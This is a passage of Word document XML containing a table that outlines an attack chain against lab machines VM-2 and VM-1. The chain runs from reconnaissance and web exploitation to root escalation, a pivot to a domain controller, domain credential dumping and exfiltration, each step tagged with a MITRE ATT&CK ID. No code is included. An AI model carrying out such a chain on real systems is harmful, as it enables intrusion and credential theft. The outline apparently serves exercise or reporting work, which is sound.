          <w:p w14:paraId="201B8FCE" w14:textId="47D15FE0" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B" w:rsidP="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
            <w:r w:rsidR="001535C9" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C68A1DC" w14:textId="4A330477" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Discover external surface of VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="35164E76" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1595 / T1046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="33CCE108" w14:textId="69DBF31B" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="001535C9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Open services and webapp version identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="07541CB7" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4EACDC99" w14:textId="1A82BDCD" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
            <w:r w:rsidR="0008259B" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5897B36B" w14:textId="1B49AE79" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Web application exploitation (Exploit A)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4ECB07E8" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1190</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5DFB28AB" w14:textId="2789313A" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> Remote code execution as web-service user on VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="1961BB59" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40DE3DDF" w14:textId="7145B6CD" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
            <w:r w:rsidR="0008259B" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="28F85FFE" w14:textId="544E73C4" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Escalate to root on VM-2 (Exploit B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5B874DCB" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1068 / T1548</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="70C03943" w14:textId="4ACFE662" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Root shell and harvested credentials on VM-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="5143712B" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="555D107C" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4 Lateral Move</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E4E4600" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Pivot to internal domain VM-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4BE06FDA" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1021 / T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7C2FCFCA" w14:textId="4FFC3CFD" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Access to domain controller with credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F5D4B" w:rsidRPr="00796916" w14:paraId="31C8E023" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="235950F8" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5 Credential Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34840579" w14:textId="3BA6924E" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Try to dump domain credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="951" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="47D2C275" w14:textId="77777777" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>T1003.003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3561" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B7AD1A0" w14:textId="2BF6C4E1" w:rsidR="005F5D4B" w:rsidRPr="00796916" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Privileged domain hash/credentia</w:t>
            </w:r>
            <w:r w:rsidR="0008259B" w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0008259B" w:rsidRPr="00796916" w14:paraId="710E066A" w14:textId="77777777" w:rsidTr="0008259B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1555" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D7DBE3"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EFF1F4"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="024B5FAF" w14:textId="77777777" w:rsidR="0008259B" w:rsidRPr="00796916" w:rsidRDefault="0008259B" w:rsidP="0008259B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00796916">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>6 Collection/Exfil</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3293" w:type="dxa"/>
            <w:tcBorders>
